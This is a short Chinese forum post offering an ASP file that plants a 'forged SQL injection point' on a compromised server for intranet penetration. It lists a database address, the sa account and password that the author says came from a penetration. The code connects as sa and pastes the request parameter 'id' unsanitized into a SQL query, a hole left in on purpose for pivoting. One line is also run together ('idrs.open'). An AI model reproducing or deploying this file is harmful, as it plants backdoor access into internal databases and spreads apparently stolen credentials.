伪造sql注入点的完整文件
最近一直有人问关于伪造注入点 进行内网渗透的一些问题<br/><br/>其实这个文件大家早就见过 竟然有些人说不完整 缺少 conn.asp 倒...<br/><br/>给个完整的及设置办法 这个文件是偶在渗透的时候写到的<br/><br/>数据库服务器 1.0.5.195 <br/>帐户 sa<br/>密码 accountbase<br/>数据库名 gameaccount_server<br/><% <br/>strSQLServerName = "1.0.5.195" '服务器名称或地址<br/>strSQLDBUserName = "sa" '数据库帐号<br/>strSQLDBPassword = "accountbase" '数据库密码<br/>strSQLDBName = "gameaccount_server" '数据库名称<br/>Set conn = Server.CreateObject("ADODB.Connection")<br/>strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"<br/>conn.open strCon<br/>dim rs,strSQL,id <br/>set rs=server.createobject("ADODB.recordset") <br/>id = request("id") <br/>strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3 <br/>rs.close <br/>%>
页:
[1]